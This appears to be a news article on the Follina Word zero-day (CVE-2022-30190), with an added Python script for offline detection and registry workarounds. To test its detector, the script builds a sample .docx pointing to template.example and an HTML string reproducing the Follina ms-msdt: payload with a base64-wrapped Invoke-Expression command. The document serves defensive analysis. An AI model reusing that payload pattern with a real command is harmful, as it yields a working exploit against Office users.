Hackers can take control as soon as a Word file is opened

By now almost everyone has heard that macros in Microsoft Word can be dangerous. After all, the software blocks them by default and displays a warning banner. Macros are not the only way to use Word to infect a computer, however. On Twitter, the user @nao_sec shared malicious code discovered in a Word document.

The code exploits a flaw nicknamed Follina. It is classified as a "zero-day", meaning it was already being exploited by attackers before any patch existed (Microsoft had "zero days" to prepare one). @nao_sec came across the code by chance on VirusTotal while searching for documents that use another flaw. An Internet user located in Belarus appears to have submitted the document to the site to check whether the various antivirus engines detected it.

A code hidden in base 64

The code uses Word's remote template feature to load an HTML file from a server. That HTML page then abuses the Microsoft Support Diagnostic Tool (MSDT), by invoking its ms-msdt: URL handler, to fetch a file and run PowerShell commands, and this works even with macros disabled. The author of the code used the same trick seen on some websites to hide the offending commands: they are encoded in base64 and only decoded at run time.
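As an added example (not code from the article, from @nao_sec or from Microsoft), the Python script below shows how an analyst can check a .docx offline for exactly this chain: an attachedTemplate relationship in the document that points at an external URL, and, in the HTML the analyst has separately fetched from that URL, an ms-msdt: invocation carrying a base64-wrapped command. The document, the template URL (template.example) and the HTML page are constructed inside the script, and the base64 payload decodes to a harmless Write-Host, so everything runs without network access; the script never contacts the template server itself.

```python
"""Offline triage of a .docx for a Follina-style (CVE-2022-30190) chain:
remote template -> HTML calling ms-msdt: -> base64-wrapped PowerShell.
Added example; the document, URL and payload are constructed (harmless)."""
import base64
import io
import re
import string
import zipfile
import xml.etree.ElementTree as ET

REL_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
TEMPLATE_REL = ("http://schemas.openxmlformats.org/officeDocument/2006/"
                "relationships/attachedTemplate")
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"
R_NS = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"

# Constructed stand-ins (assumptions, not captured data).
SAMPLE_TEMPLATE_URL = "http://template.example/template.html"
SAMPLE_PAYLOAD = "Write-Host follina-detection-test"

def build_sample_docx():
    """A macro-free .docx whose settings.xml attaches a template over HTTP."""
    settings = (f'<w:settings xmlns:w="{W_NS}" xmlns:r="{R_NS}">'
                '<w:attachedTemplate r:id="rId1"/></w:settings>')
    rels = (f'<Relationships xmlns="{REL_NS}"><Relationship Id="rId1" '
            f'Type="{TEMPLATE_REL}" Target="{SAMPLE_TEMPLATE_URL}" '
            'TargetMode="External"/></Relationships>')
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("word/document.xml", f'<w:document xmlns:w="{W_NS}"/>')
        z.writestr("word/settings.xml", settings)
        z.writestr("word/_rels/settings.xml.rels", rels)
    return buf.getvalue()

def build_sample_html():
    """What the remote template might return: filler, then a script that
    hands a base64-wrapped command to the ms-msdt: handler."""
    b64 = base64.b64encode(SAMPLE_PAYLOAD.encode()).decode()
    return ("<html><body><!--" + "A" * 4096 + "--><script>\n"
            'window.location.href = "ms-msdt:/id PCWDiagnostic /skip force '
            "/param 'IT_BrowseForFile=$(Invoke-Expression("
            "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String("
            f"'{b64}'))))'\";\n</script></body></html>")

def external_templates(docx_bytes):
    """Targets of attachedTemplate relationships marked TargetMode="External"."""
    name = "word/_rels/settings.xml.rels"
    with zipfile.ZipFile(io.BytesIO(docx_bytes)) as z:
        if name not in z.namelist():
            return []
        root = ET.fromstring(z.read(name))
    return [rel.get("Target") for rel in root.iter(f"{{{REL_NS}}}Relationship")
            if rel.get("Type") == TEMPLATE_REL
            and rel.get("TargetMode") == "External"]

B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

def decode_base64_runs(text):
    """Decode every long base64-looking run, keeping only printable results;
    this drops filler such as the 'AAAA...' block, which decodes to NULs."""
    out = []
    for run in B64_RUN.findall(text):
        run += "=" * (-len(run) % 4)          # repair missing padding
        try:
            decoded = base64.b64decode(run, validate=True).decode("utf-8")
        except ValueError:                    # bad base64 or not UTF-8
            continue
        if decoded and all(c in string.printable for c in decoded):
            out.append(decoded)
    return out

def analyze_template_html(html):
    """Flags from a template page the analyst fetched separately."""
    return {
        "invokes_msdt": "ms-msdt:" in html.lower(),
        "msdt_packages": re.findall(r"ms-msdt:/id\s+(\w+)", html, re.I),
        "decoded_payloads": decode_base64_runs(html),
    }

def triage(docx_bytes, fetched_html=None):
    """One verdict line per finding; never fetches the template itself."""
    verdict = [f"remote template: {t}" for t in external_templates(docx_bytes)
               if t.lower().startswith(("http://", "https://"))]
    if fetched_html is not None:
        found = analyze_template_html(fetched_html)
        if found["invokes_msdt"]:
            verdict.append("template invokes ms-msdt: "
                           + ", ".join(found["msdt_packages"]))
        verdict += [f"decoded payload: {p}" for p in found["decoded_payloads"]]
    return verdict

if __name__ == "__main__":
    for line in triage(build_sample_docx(), build_sample_html()):
        print(line)
```

The printable-text filter is what makes the base64 step usable on real samples: a long filler block of repeated characters also matches the base64 pattern, but it decodes to non-printable bytes and is dropped, while the genuine command survives. Running the file prints one line per finding.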

The researchers do not know what the author's exact goal was, since the second file is no longer available. But once the code can execute PowerShell commands, it can potentially take full control of the computer and attack other machines on the local network.

Follina is particularly problematic. By default, Word opens .docx files in Protected View, and the code then runs only if the user clicks "Enable Editing". If the document is in .rtf format, however, that protection does not apply. Worse, in that case it is enough to select the file in File Explorer with the preview pane enabled, without opening it, for the code to run.

A demonstration of how Follina works on an updated version of Office 2021. © Didier Stevens

A report already refused by Microsoft in April

The code works on all versions of Microsoft Office since at least 2013, including a fully updated Office 2021. It turns out the problem had already been reported to Microsoft in April by Shadow Chaser Group, a team of students who hunt for vulnerabilities. A member of the Microsoft Security Response Center (MSRC) named John merely replied that this was not a security issue and that the submitted sample did not work on his machine. Microsoft appears to have changed its mind: on May 30 it registered the flaw as CVE-2022-30190.

For now there is no simple way to protect against this attack. Until a patch arrives, the most widely circulated workaround is to edit the registry so that Word can no longer launch the diagnostic tool: create a DWORD value named EnableDiagnostics under HKLM\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics and set it to 0 (the value behind the Scripted Diagnostics group policy that allows users to run troubleshooting wizards). Microsoft's own guidance for CVE-2022-30190 goes further and disables the ms-msdt: URL protocol handler itself, by exporting the HKEY_CLASSES_ROOT\ms-msdt key as a backup and then deleting it.

Be warned, though, that this workaround is for advanced users only. A mistake when editing the registry can damage the system and prevent the computer from starting.
